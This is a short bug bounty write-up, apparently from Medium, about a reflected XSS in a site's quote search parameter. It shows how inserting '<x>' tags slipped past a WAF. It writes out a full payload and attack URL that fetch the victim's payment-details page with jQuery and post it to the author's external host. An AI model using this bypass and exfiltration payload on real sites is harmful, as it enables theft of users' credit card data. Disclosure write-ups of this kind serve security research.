Bypassing XSS filter and Stealing User Payment Data

Osama Avvan
Jun 17, 2019 · 2 min read

So here is another writeup about how I bypassed XSS filter and created a payload to get user credit card data. It was a private program on bugcrowd, let’s just say it was named Redact.

Here is the URL https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=XSS The parameter searchValue was reflected inside an input feild.

So by putting an I was able to break out of the input field, after that, I tried the most basic payload “><script>alert(1)</script>, but unfortunately my request was blocked by WAF. so I tried another payload “onmouseover=alert(1) and again my request was blocked by WAF.

After some playing around, I found out that anything between <> was being removed, so if type something like this “o<x>nmouseover=alert<x>1//

<x> will be removed leaving it only with “onmouseover=alert(1)// and finally i was able to pop up a XSS.

Now there was a page which allows the user to view their payment Data https://www.redact.com/us/en/smbpro/my-account/payment-details, so I thought it would be a good idea to include this in my report that how I can get users credit card data with this XSS.

So the Payload for stealing user credit card data was this “o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

As the page was using jQuery, I requested the whole payment data page with $.get() and posted the page content to my server with $.post(), so now with this payload, I was able to get users payment data:

https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=“o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

Image for post
Image for post

But unfortunately, my report got duplicate.

Thank You for Reading.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store